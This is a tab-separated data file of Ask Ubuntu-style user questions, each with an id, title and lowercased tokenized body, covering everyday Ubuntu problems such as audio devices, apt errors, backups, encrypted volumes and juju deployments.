199658	activemq-cpp package for ubuntu	i need apache activemq-cpp library package for ubuntu . i know there is build for fedora , but i ca n't find one for ubuntu . do you know where i can download the package ? i 've already build one with checkinstall but i 'm not quite sure how portable it is .
199659	how can light sensor be enabled for control brightness and keyboard back-light automatically ?	i have a sony vaio laptop f-series ( ) nvidia and it has light sensor . when i was using windows , this light sensor controlled the brightness and the keyboard backlight automatically due to the surroundings state . but when using ubuntu 12.04 , it only controls the backlight without automatically adjusting the brightness . how can i enable light sensor to automatically adjustment the lcd brightness without losing the keyboard backlight adjustment due to surrounding state ?
199661	how do you set system display color profiles in xubuntu and lubuntu ?	some applications , such as gimp , geeqie and rawstudio claim to be able to use system color profile in their color management , but how do you setup such a profile ? how do you see , if such a profile has been set , and if it has been set , how do you see which profile is used ? i do n't see how to do it in lubuntu and xubuntu .
199662	how to set owner and permission to a cryptsetup made device ?	i have an encrypted loopback volume . i need to mount and umount the volume manually , so i use cryptsetup luksopen and cryptsetup luksclose . however , under all sessions ( gnome/xfce/kde/unity ) , when i invoke this command it pops up the /dev/mapper device ... and then it lets the one user mount ( with password ) , access files , and unmount the volume . it 's quite annoying in a multi user server ( you are working on your files and the volume is being unmounted ) . i want the volume to be owned and used by only root and the owner and not all users . how can i define ownership and permission on the device ? more informations : i 've tried chown and chmod approach witch gives nothing . cryptsetup does n't have any options that let you do that . crypttab auto mount the filesystem on boot witch is unwanted ( only manual mount ) the permissions that cryptsetup put in the `` /dev/mapper/myencryptedvolume '' is owner root/root but with `` lrwxrwxrwx '' whatever i do ( like a chmod ) wo n't do anything . it 's a device ( `` /dev/mapper/myencryptedvolume '' ) that is linked to `` /dev/dm-0 '' with rights `` brw-rw -- -- '' i 've changed the rights of `` /dev/dm-0 '' with udev rule but nothing change : the volume is still shown to normal users due to the symbolic link . thank you
199665	does 'owning ' a directory or file give you and special permissions ?	i 've read a little about chmod and have a high-level understanding of file permissions . but i 'm a little confused about the concept of an 'owner ' . if my user account is the 'owner ' of a directory but it has no permissions ( chmod 0000 ) does my user have any more ability to do anything than another random user on the system ? assuming neither user is a super user ?
199666	localhost still exist after deleting xampp	after installing xampp , somehow localhost bugged on me . i put my files , changed permissions , in the end deleted the xampp , but i always get this message : it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . wiped the folder , tried restarting either , there 's no xampp but i 'm still getting it , what 's the problem ?
199667	changing default browser in xubuntu	xubuntu comes with firefox as a default browser . i however prefer opera and would like to make it my default browser . example : i click a link in thunderbird and would like it to open in opera and not in firefox , as it is now.. how do i proceed ?
199672	aspire one 722 graphics driver installation boots and freezes to blank screen ?	acer aspire 722 - dual boot with ubuntu 12.04 inside windows 7 . as i have updated my ubuntu 12.04 and installed the restricted hardware ( graphics ) drivers , the system boots and freezes to a blank screen . a hard reset is the only option to reboot .
199674	how do i complete clean the apt-get database to be like the moment it was installed ?	i want to completely clean my ubuntu 's apt-get database to be just like the installation moment . when i run sudo apt-get update it has too many sources . i want to delete them and recreate the database with the apt-get upgrade command .
199679	is there a driver for hp 3d drive guard ?	in some hp laptops have 3d drive guard system . i dont how it works but there is a link about it . in windows hp depends it but i didnt find a driver about it for linux . hp 3d driveguard protects the hard drive ( hdd ) by `` parking the heads '' if the notebook is accidentally dropped or is abruptly impacted by another object . is there a driver for this for ubuntu ?
199682	how can i force apt to optimize the dependency tree for minimal download size ?	some background information : as you may know , in a debian package , there may be alternative dependencies , written in the control file as depends : apache2|something-else , for example . how does apt select which dependencies to choose , and how can i override this so i can minimize download size ? i 'm on a slow connection on some locations and need it to use the smallest total download size . how can i force it to do so ? edit : i 'm not asking about skipping recommends . edit 2 : i am not asking about skipping dependencies . i am trying to get all dependencies , just in the smallest total size , especially noting and deeply traversing package1|package2 choices . edit 3 : a grep or otherwise shell script is acceptable . unfortunately , since the current answers do not really answer the question , they ca n't really get the bounty . it 's still out there for someone willing to write a bash script ! edit 4 : although the bounty has been awarded to a good answer which i encourage you to upvote , i am still seeking a more concrete answer . if it also elegantly handles virtual packages provided by one or more packages , then i 'll possibly give another after-the-fact bounty to award that answer .
199683	dhcp3-server or isc-dhcp-server	so . i need a dhcp server on my ubuntu server . i 've found two options , and some saying it 's the same thing ? could someone explain the difference , maybe even pros and cons ? if it 's not the same .
199688	ubuntu 12.04 windows snap feature	when i first installed ubuntu 12.04 lts 32.bit from a live-cd without internet connection and any updates the snapping feature worked fine for windows of all applications . however , after some updates and installations it stopped working . i can no longer drag a window to the edge of the screen and have it resized . thinking the problem is from my lack of experience i did a clean install of ubuntu 12.04 again with internet connection ; however , the problem still persists and i am fed up with this . do you have any suggestions for remedy ? thanks in advance . p.s : the feature when working properly was just like that in windows 7 . i am a new user btw so i might be skipping some important details , and i would be glad if you can remind me of them .
199691	built in mic not working in skype	i am using xubuntu on my e325 and i am having a hard time making my mic work on skype . i know that i have working mic , because i was able to record sounds via sound recorder , but skype is for some reason not smart enough to use the same source.. i really tried to look on forums and play with the settings , but was not lucky enough to get it magically fixed.. can anyone help ?
199707	is 'userspace virtual filesystem - backends ' necessary during installation of gimp ?	because this add-on is selected by default in the software center . what it actually do ?
199710	how to revert vlc media player to its original state ?	for the last few days , my vlc player is not responding at all , when i try to double click any file or even run vlc without any file , it just does n't open up . i tried to open it through terminal and it was working fine but there were no option coming on vlc screen and also if i close the terminal , vlc closes automatically . i ca n't figure how to make vlc back to its original way so that i can access any file through vlc . any help will be appreciated..
199711	bluetooth headset can connect , but not visible in pulse audio	i have a plantronics bluetooth headset , and until yesterday i could use it without any problem . however , today it suddenly stopped working ( maybe related to the last software update i did ) . i can still connect/disconnect my headset , but it does n't show up in pulse audio anymore . i read through various posts that describes kind of the same problem , but none of the suggested solutions worked . i get following error in the syslog : oct 13 16:49:57 desktop bluetoothd [ 1040 ] : endpoint registered : sender=:1.34 path=/mediaendpoint/hfpag oct 13 16:49:57 desktop bluetoothd [ 1040 ] : endpoint registered : sender=:1.34 path=/mediaendpoint/a2dpsource oct 13 16:49:57 desktop bluetoothd [ 1040 ] : endpoint registered : sender=:1.34 path=/mediaendpoint/a2dpsink oct 13 16:50:09 desktop kernel : [ 17.340943 ] input : 48 : c1 : ac:08 : fe:8f as /devices/virtual/input/input14 oct 13 16:50:09 desktop bluetoothd [ 1040 ] : /org/bluez/1040/hci0/dev_48_c1_ac_08_fe_8f/fd0 : fd ( 36 ) ready oct 13 16:50:09 desktop rtkit-daemon [ 1894 ] : successfully made thread 2213 of process 1892 ( n/a ) owned by '1000 ' rt at priority 5 . oct 13 16:50:09 desktop rtkit-daemon [ 1894 ] : supervising 5 threads of 1 processes of 1 users . oct 13 16:50:10 desktop bluetoothd [ 1040 ] : badly formated or unrecognized command : at+xevent=user-agent , com.plantronics , plt_voyagerpro,0109,27.90 , ffffffffffffffffffffffffffffffff oct 13 16:50:10 desktop bluetoothd [ 1040 ] : audio connection got disconnected any help would be much appreciated . i 'm using ubuntu 12.04 . thanks , kim
199718	i do n't have permissions to extract a theme to usr/share/docky/themes ?	i do n't appear to have permissions to extract a theme to usr/share/docky/themes and i cant copy the extracted folder across when it is extracted . i am using lubuntu 12.04
199722	backup programs and user data from an old hdd to a new installation on ssd	i have a ubuntu system on my old hdd , which is connected via usb to this system , and a sdd is built into my notebook . at the moment i am running an ubuntu system from a usb stick . i have tried to clone my disk ( change uiid , etc ) , to transport the data with deja dup and much more . the result was nothing or strange things . my idea is to copy the important data form the old system to the new ( home and whatever ) , but it is not allowed to do this . does anyone know of a tool which can do this , or have an other idea .
199727	log into desktop using ssh ?	a few months ago i converted an old desktop computer into a basic server by putting ubuntu ( desktop version ) onto it and setting up apache2 , etc . i have ssh configured so that i can work on it remotely , and use ftp to move files . when i tried to access my server yesterday i found that it was down , and i could not get in at all . i 'm at college , and my server is at home , so i called my mom , who told me that there had been a brief power outage at my house , and i concluded that my server had restarted . i have the computer set to require a password on startup , so it turns out that it had just been sitting at the log in screen for the past few days , waiting for a password . my instinctive question is whether ssh or some other program can be used to log the system in ( as if in person ) from a remote computer after the server has been restarted . as i said , i currently have the computer set to require a password to log into the one and only user account on the server upon startup . when i ssh or ftp , i use the same log in/password , though i 'm guessing that i 'm going to be told that this is the wrong way to go about doing it , and is the source of my problem . in that case , what would you recommend ? thanks in advance . in response to the comment and answer , i do n't know what the x environment is , so it 's probably not something that i want to log in to . the way i have the server set up , when you physically turn the machine on , it boots up , and then asks for a password , just like most normal computers do . you have to enter the password in order to get to the desktop and run applications . from my experience , the web server application , ssh server application , etc . are not active until the password is entered and the desktop is loaded . hence , i need to log in to the computer in order for it to come on line as a server . what i need is a way to get the server running again ( at desktop , with apache ) after the machine loses power and boots back up without having to physically enter a password in person .
199738	how do i get https web interface in transmission ?	i use transmission 's web interface , but i do n't feel comfortable using it remotely ( outside of lan , e.g. , from a friend 's house ) due to the lack of any sort of encryption . the idea of broadcasting my transmission web interface login details , wholly unencrypted , across the internet just does n't appeal to me for some reason . ( i 'm kinda paranoid about that . i even installed a browser plugin to enable https on any site possible . ) i 've heard of , and even attempted , a few of the convoluted tutorials involving lighttpd , but i have n't had any luck so far . i just want to be able to use some sort of encryption for the web interface , so i can manage my torrents remotely . what do i need to do ?
199739	when i update my software it gives an error of the following nature .	when i click update software in ubuntu 12.04 it gives me the following error , i am unable to figure out the problem , 'encountered a section with no package : header , e : problem with mergelist /var/lib /apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . ' also because of this the sign ( in the red circle ) appears on my launch bar , like shown in the snapshot below , any ideas or solutions or fixes please regards , mks
199742	volume control via media keys in xubuntu	i noticed that the volume control when i use xubuntu is not really working properly . i can see , that xubuntu is recognizing that it should do something and displays a small image indicating volume up/down or mute . but , it is not affecting the sound i hear for instance while using youtube . when i open my pulseaudio i see in output devices tab two devices : built in audio digital stereo and built-in analog stereo . the indication for sound volume for the first device actually does react when i press the media keys for volume up/down . but this should be the second device that should be controlled by my media keys . so the question is , how do i change the device controlled by media keys ? also , i noticed , that under ubuntu the media keys work fine , and it is possible to control volume with them..
199745	open folders with google chrome instead of the default file manager	i 'd like to set google chrome as the default application for opening files on ubuntu . how can i change the default file manager to chrome , instead of nautilus ( which i believe is the default file browser ? )
199746	why does it take so long for my usb speakers to be recognized by pulseaudio ?	i have an xbmcbuntu installation ( based on ubuntu 11.10 ) , meaning that i do n't have a graphical desktop environment installed . i 've connected a set of usb speakers , and for about a minute or two , running pacmd list-sinks yields only one sink : my laptop 's onboard sound card . after about 3 minutes , running the same command yields both the original sound card and the usb speakers , at which point i can run pacmd set-default-sink alsa_output.usb-1130_usb_audio-00-audio.analog-stereo and play sound out of the peripheral speakers . unfortunately , the changes brought forth by the pacmd set-default-sink command are n't persistent across reboots . i suspect that this is because pulseaudio falls back on the onboard sound card when it ca n't detect the usb speakers for those first three minutes . of course , i 'm not really sure that this is the case , but it begs the following questions : why does it take so long to detect the speakers ; is there anything i can do to speed things up ? is there a way of making these changes persistent other than scheduling a cronjob to run pacmd set-default-sink alsa_output.usb-1130_usb_audio-00-audio.analog-stereo after a few minutes of uptime ? thanks !
200747	why wo n't kubuntu load my cd ?	i 'm running kubuntu 12.04.1 lts and kubuntu has n't recognised my cd ! here are the results of a sudo fdisk -l : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000c5a81 device boot start end blocks id system /dev/sda1 * 2048 964603903 482300928 83 linux /dev/sda2 964605950 976771071 6082561 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 964605952 976771071 6082560 82 linux swap / solaris how am i meant to view it in say , dolphin ?
200748	ubuntu software center wont open	im running ubuntu 12.04 with cinnamon1.6 de my ubuntu software center only opens for 2 seconds and then closes . this is the errer message i got when i tried to open it in the terminal . ja @ ja-inspiron-n5040 : ~ $ sudo software-center -- enable-lp [ sudo ] password for ja : 2012-10-13 15:30:11,282 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-10-13 15:30:11,286 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-10-13 15:30:11,419 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2012-10-13 15:30:11,572 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2012-10-13 15:30:11,575 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 149 , in open self._list.read_main_list ( ) systemerror : e : type 'upd8 ' is not known on line 2 in source list /etc/apt/sources.list.d/nilarimogard-webupd8-precise.list 2012-10-13 15:30:13,555 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 171 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 238 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 511 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 271 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 450 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 439 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' ja @ ja-inspiron-n5040 : ~ $
200750	how to merge two disk ubuntu primary partitions	i installed by mistake two primary ubuntu partitions on dual booting pc ( 64-bit ) with windows 7 and ubuntu 12.04 . first i tried someting else when installing ubuntu 12.04 , then i changed my mind and installed ubuntu 12.04 without defining partition . i have about 1tb available for windows 7 , pc starts from ubuntu as default . result was two primary partitions in ubuntu , 890 gb and 16 gb . ubuntu os resides in partition 16 gb . then i installed software openfoam and it was installed in partition 890 gb . i can not use it as it stands . what would you advice ? reinstall ubuntu ? use gparted ? i already have a boot cd for gparted .
200753	how to mount a network drive ?	i 'm trying to set-up a home file server . i 'm thinking about just setting it up as an ftp server , no particular reason other than i 'm familiar with ftp and samba tends to be very frustrating . basically the set-up i 'm going for , is to be-able to create multiple user accounts for the server and restrict or allow access to specific folders on each user . ftp is the only way ( that i know of ) to accomplish a set-up like that . how can i mount an ftp server as a drive in ubuntu so that all my applications can access it just like any other driver or folder . an example would be downloading 12.10 via torrent when it comes out , i would like to be able to tell transmission to just download the file straight to my ftp server . i know how to do this in windows , its actually very easy . but i cant figure it out in ubuntu . i have tried using the `` connect to server '' option in nautilus , and it works , but it doesn’t give me the result i want , most applications don’t see the folder , while others can . also i am open to options other than ftp if anyone has any suggestions . i 've looked into freenas but that doesn’t seem to allow me to control the user accounts the way i want to . then after all is said and done i would still need a way to mount the shares as a drive in ubuntu . the ability to mount network drives in windows is one of my favourite features , but seeing how ubuntu is now my daily os and has been for about 4 years , i really need a way to accomplish the same thing in ubuntu . also a gui would be preferable , seeing as there will be multiple people using this server , i would like it to be as easy as possible . edit : this link here seems to be almost exactly what i 'm wanting to do , if i could find a gui that can do this ill be almost set . then i would just need to find a way to hide specific folders from certain users .
200757	broke my sudoers password , how do i reset it without using sudo ?	i thought it would be a good idea to finally take the password off my little netbook since it has never actually been of any use , and has mostly just slowed down . but when i went to change my password , there was n't even an option to make it blank , and any attempt to make it a few easy characters was met with `` password too weak '' . so i did what any good geek would do and popped open the terminal , read the manual entry for passwd and quickly used the -d option to remove the password from my account . it all went well for a couple days ( i even managed to also make my keychain password blank ) until i tried to update the thing . my sudoers password is not blank , and it 's not my old password . i have no idea what it is . how do i reset it ( or even better , make it blank ) without the use of the sudo command ?
200765	java console does n't recognize arrow keys	i have some strange problems with a java console on my 10.04 server ( it 's actually the console of a minecraft-server , but i believe it 's a general problem and not something minecraft specific ) : arrow keys are n't recognized properly . whenever they are used inside the java console , they produce something like this : ^ [ [ a ^ [ [ b ^ [ [ c ^ [ [ d they work fine on the rest of the system , though . i have already tried several things like checking system-locales or setting specific locales for java only but without any luck . any ideas what 's the reason behind it and how it could be fixed ? thanks in advance . edit ( oct 29 ) : after reading the first answer and testing several things , i figured out some more about this issue . there is now program running on top of the shell , the issue is mostly caused by problems with java 's jline library that is used by the java application ( or its console , to be more specific ) . for testing purpose i switched to from openjdk6 to orcalejdk6 and the issue was gone . testing openjdk7 is not possible as there is no version for 10.04 . i assume some connections with jline since this is the library responsible for handling console out- and input . probably the version used by the application is somehow incompatible with the older openjdk version used on the server . but compatible with the more up-to-date version of oracle-java i installed manually . i still have not figured out how ubuntu 's jline-package fits into this picture . for me there is no difference between testing with and without it . will edit this post again if i figure out something . if anybody has an idea , please let me know .
200774	boots up into terminal	i am running a 64 bit version of ubuntu 12.04.1 , and i when i boot up , i am thrown ( rather violently . : p ) a full-sized terminal , instead of my lovely gui login screen.. so i looked around and tried the `` startx '' command , which works like a charm . only problem is that now , i have no clue how to keep it from booting to the terminal every time , and boot up into the regular gui with all my stuff . i did install some kernel updates the night before , though i restarted my computer twice after i had done so without a problem . thanks for your time !
200777	change right-click menu background color	i 'm using a modified ambience theme ( found in the ambience-colors package , here : http : //www.webupd8.org/2012/01/download-ambiance-and-radiance-themes.html ) and the right-click menus of the ambiance colored themes are white , just like the original ambiance theme on 12.04 ( but there are mods for that one ) how can i change the color of the right-click menu to black with the ambiance-color theme ?
200782	install ubuntu 12.04 on a partitioned windows 7	i have a partition windows 7 400gb and 200gb , i want to install ubuntu 12.04 on the 200gb using a usb but am not sure how to identify 200gb when the installation process because it never shows a hard drive with that exact available space . i am not sure what to do , and i am not very familiar with ubuntu . help please
200789	how to access the menu of the webapp using hud ?	when i open a web app and try to use the hud it shows me settings for the browser rather than the app itself . help ? i have this problem with all of my web apps not just google docs .
200794	why does webapps open another browser icon ?	when i open the bbc web app , it opens another window of chromium despite me already having one open . the happens with all of my web apps . the image above will show you what i am talking about .
200800	lenovo x220 right click does not work with ubuntu 12.04	i am unable to right click with my new x220 lenovo sub-notebook . i have read several workaround but even not know which one would help me . can someone help me to find the solution or workaround ? dpkg-buildpackage : export cflags from dpkg-buildflags ( origin : vendor ) : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security dpkg-buildpackage : export cppflags from dpkg-buildflags ( origin : vendor ) : -d_fortify_source=2 dpkg-buildpackage : export cxxflags from dpkg-buildflags ( origin : vendor ) : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security dpkg-buildpackage : export fflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export ldflags from dpkg-buildflags ( origin : vendor ) : -wl , -bsymbolic-functions -wl , -z , relro dpkg-buildpackage : source package xserver-xorg-input-synaptics dpkg-buildpackage : source version 1.6.2-1ubuntu1~precise2 dpkg-buildpackage : source changed by timo aaltonen < tjaalton @ ubuntu.com > dpkg-buildpackage : host architecture amd64 dpkg-source -- before-build xserver-xorg-input-synaptics-1.6.2 fakeroot debian/rules clean dh clean -- with quilt , autoreconf , xsf -- builddirectory=build/ dh_testdir -o -- builddirectory=build/ dh_auto_clean -o -- builddirectory=build/ dh_quilt_unpatch -o -- builddirectory=build/ removing patch 131_reset-num_active_touches-on-deviceoff.patch restoring src/synaptics.c removing patch 130_dont_enable_rightbutton_area.patch restoring conf/50-synaptics.conf removing patch 129_disable_three_touch_tap.patch restoring src/synaptics.c removing patch 128_disable_three_click_action.patch restoring src/synaptics.c removing patch 126_ubuntu_xi22.patch restoring configure.ac removing patch 125_option_rec_revert.patch restoring test/fake-symbols.h restoring test/fake-symbols.c removing patch 124_syndaemon_events.patch restoring tools/syndaemon.c removing patch 118_quell_error_msg.patch restoring tools/synclient.c restoring tools/syndaemon.c removing patch 115_evdev_only.patch restoring conf/50-synaptics.conf removing patch 106_always_enable_vert_edge_scroll.patch restoring src/synaptics.c removing patch 104_always_enable_tapping.patch restoring src/synaptics.c removing patch 103_enable_cornertapping.patch restoring src/synaptics.c removing patch 101_resolution_detect_option.patch restoring include/synaptics-properties.h restoring man/synaptics.man restoring src/synapticsstr.h restoring src/properties.c restoring src/synaptics.c restoring tools/synclient.c removing patch 02-do-not-use-synaptics-for-keyboards.patch restoring conf/11-x11-synaptics.fdi no patches applied dh_autoreconf_clean -o -- builddirectory=build/ dh_clean -o -- builddirectory=build/ dpkg-source -b xserver-xorg-input-synaptics-1.6.2 dpkg-source : warning : no source format specified in debian/source/format , see dpkg-source ( 1 ) dpkg-source : info : using source format `1.0' dpkg-source : info : building xserver-xorg-input-synaptics using existing xserver-xorg-input-synaptics_1.6.2.orig.tar.gz dpkg-source : info : building xserver-xorg-input-synaptics in xserver-xorg-input-synaptics_1.6.2-1ubuntu1~precise2.diff.gz dpkg-source : warning : the diff modifies the following upstream files : autogen.sh docs/readme.alps docs/tapndrag.dia docs/trouble-shooting.txt dpkg-source : info : use the '3.0 ( quilt ) ' format to have separate and documented changes to upstream files , see dpkg-source ( 1 ) dpkg-source : info : building xserver-xorg-input-synaptics in xserver-xorg-input-synaptics_1.6.2-1ubuntu1~precise2.dsc debian/rules build dh build -- with quilt , autoreconf , xsf -- builddirectory=build/ dh_testdir -o -- builddirectory=build/ dh_quilt_patch -o -- builddirectory=build/ applying patch 02-do-not-use-synaptics-for-keyboards.patch patching file conf/11-x11-synaptics.fdi hunk # 1 succeeded at 9 ( offset 7 lines ) . applying patch 101_resolution_detect_option.patch patching file include/synaptics-properties.h patching file man/synaptics.man patching file src/properties.c hunk # 3 succeeded at 787 ( offset 6 lines ) . patching file src/synaptics.c hunk # 2 succeeded at 1403 ( offset 3 lines ) . hunk # 3 succeeded at 1421 ( offset 3 lines ) . patching file src/synapticsstr.h patching file tools/synclient.c applying patch 103_enable_cornertapping.patch patching file src/synaptics.c hunk # 1 succeeded at 762 with fuzz 1 ( offset 202 lines ) . applying patch 104_always_enable_tapping.patch patching file src/synaptics.c hunk # 1 succeeded at 662 with fuzz 2 ( offset 6 lines ) . applying patch 106_always_enable_vert_edge_scroll.patch patching file src/synaptics.c hunk # 1 succeeded at 673 ( offset 174 lines ) . applying patch 115_evdev_only.patch patching file conf/50-synaptics.conf hunk # 1 succeeded at 14 with fuzz 2 . applying patch 118_quell_error_msg.patch patching file tools/synclient.c patching file tools/syndaemon.c applying patch 124_syndaemon_events.patch patching file tools/syndaemon.c applying patch 125_option_rec_revert.patch patching file test/fake-symbols.c patching file test/fake-symbols.h applying patch 126_ubuntu_xi22.patch patching file configure.ac applying patch 128_disable_three_click_action.patch patching file src/synaptics.c hunk # 1 succeeded at 671 ( offset 174 lines ) . applying patch 129_disable_three_touch_tap.patch patching file src/synaptics.c hunk # 1 succeeded at 665 ( offset 32 lines ) . applying patch 130_dont_enable_rightbutton_area.patch patching file conf/50-synaptics.conf applying patch 131_reset-num_active_touches-on-deviceoff.patch patching file src/synaptics.c applying patch 201-wait.patch patching file src/eventcomm.c hunk # 1 failed at 750 . hunk # 2 failed at 775 . hunk # 3 failed at 784 . 3 out of 3 hunks failed -- rejects in file src/eventcomm.c patch 201-wait.patch does not apply ( enforce with -f ) dh_quilt_patch : quilt -- quiltrc /dev/null push -a || test $ ? = 2 returned exit code 1 make : *** [ build ] error 25 dpkg-buildpackage : error : debian/rules build gave error exit status 2
200801	how should a raid partition be created and configured using parted ?	for testing i want to create a mirrored ( raid 1 ) partition with a size of 1gb on /dev/sdb and /dev/sdc . when it comes to partitioning , i want to used parted , how should i create the partition i want to mirror ? i start by initializing the partition table : ( parted ) select /dev/sdb using /dev/sdb ( parted ) mklabel gpt warning : the existing disk label on /dev/sdb will be destroyed and all data on this disk will be lost . do you want to continue ? yes/no ? y ( parted ) after the above steps . how do i create the partition and set any necessary flags ? i know that raid is a possible partition flag , do i have to use it ? how is it used by the running system ? which file system type should i use ? none ?
200802	need a different backup solution	i just built a new media/backup server using ubuntu 12.04 64bit . i installed a hard drive to be used only for music , pictures , and videos and formatted it fat32 so my 1 and only windows pc could map those folders as netshares . my laptop , also running ubuntu 12.04 , is what i am using the most so new media is first downloaded on my laptop . i 've already got the music , videos , and pictures folders from my server mounting as shares on my laptop on boot thanks to some fstab edits and sshfs . now i 'm wanting either an app or script that could backup any new files i add to my local media folders to the mounted folders on my server . i 've been googling all day and found a few apps like rsync but they seem to have issues with ext4 to vfat backups . i thought maybe a script would be best but i 'm new to scripting in linux and do n't want to mess anything up . basically i am looking for something that will backup only newly added files to the server . i figure i could schedule it once a week . there are some stipulations . for example , my local music folder has over 700 folders for each artist/band then sub folders inside those for albums . i want something smart enough to only copy newly added content so i 'm guessing the modified date would probably be a good condition if i were scripting . i 'm rambling . any suggestions would be greatly appreciated . i 'm not finding anything to suit my needs . i 'm almost to the point of just learning bas scripting so i can write something but then it will be a couple weeks or so before i have a possible solution and i 'd like something in place sooner .
200815	how grub top title can be changed	i am just wondering that 'how i can change the title on very top for grub ' - where it 's written like 'gnu grub version 1.99-21ubuntu3.4 ' ? i am not asking for the menu entry , or to change labels of menus . i just wish to write something as i want , at the very top in grub menu . anyone , please help me . thanking you . raihan
200821	installing numpy for python 3.1.2 on ubuntu 10.04	i have installed numpy for python 2.6.5 . i want to use it for python 3.1.2 and i do n't know how to install it . i 'm new to ubuntu and i do n't know how to install it from tar file . i am using geany for programing in python3 . if i managed to installed it from there would it work in geany ?
200823	public address null and present state pending after destroy-environment , disabling firewall and bootstrap again	i have done everystep as it was written on ubuntu 12.04 maas , but now i am stuck here for over a month and could not find how to solve it .. please help .. when i do juju status it says : cloudc @ cloud : / $ juju status 2012-10-14 06:02:24,357 info connecting to environment ... 2012-10-14 06:02:41,961 info connected to environment . machines : 0 : agent-state : not-started dns-name : node3 instance-id : /maas/api/1.0/nodes/node-d62ea8b4-0cc6-11e2-8d8d-000c29433e91/ instance-state : unknown 1 : instance-id : pending 2 : instance-id : pending services : mysql : charm : cs : precise/mysql-8 exposed : true relations : { } units : mysql/0 : agent-state : pending machine : 1 open-ports : [ ] public-address : null tomcat : charm : cs : ~robert-ayres/precise/tomcat-3 exposed : true relations : cluster : - tomcat units : tomcat/0 : agent-state : pending machine : 2 open-ports : [ ] public-address : null 2012-10-14 06:02:45,675 info 'status ' command finished successfully cloudc @ cloud : / $ : here public address null and present state pending .. i also have done juju destroy-environment , disable firewall by ufw disable and also repeat all the steps but still no change in status .. help please . what i have to do ? and how to solve this problem ...
200824	what are the options for managing multiple ubuntu installations together and keeping them in same state	recently i got in charge of managing 2 computer labs ( currently 35 workstations , could double in a month or two ) in university with total control over software stack as long as i install a bunch of commonly used scientific software ( mathematica and friends ) . i plan to use ubuntu for various reasons . installing ubuntu and managing updates etc by hand is certainly an option , but i want to know if there is a more efficient way to do this stuff in and a more `` do n't repeat yourself '' manner ? tasks ubuntu installation installation ( duplication ) of same software stack and configuration over each workstation keeping them updated
200826	pitfalls of replacing networkmanager with wicd ?	i 've been looking for an alternative to networkmanager that is more accessible from the command line , and i 've read some good things about wicd . i 'm wondering : does anybody know what the pitfalls/trade-offs are of moving to wicd ? so far , it sounds like it does n't handle vpn and some other setups . are there any pitfalls to removing/replacing networkmanager , at least on ubuntu 12.04 desktop ? fwiw , i 'm specifically interested in auto-association with remembered wireless networks , and auto link-local address setup - nothing super fancy configuration-wise . [ in case anyone is to point this out , i know networkmanager has nmcli , but if you 've ever used this , you know it is ( a ) poorly documented and ( b ) ca n't do everything in the networkmanager gui . e.g . the system-connections conf file format is undocumented , and you ca n't create new connection profiles without intimately knowing networkmanager ( you need to generate uuids and whatnot ) . ]
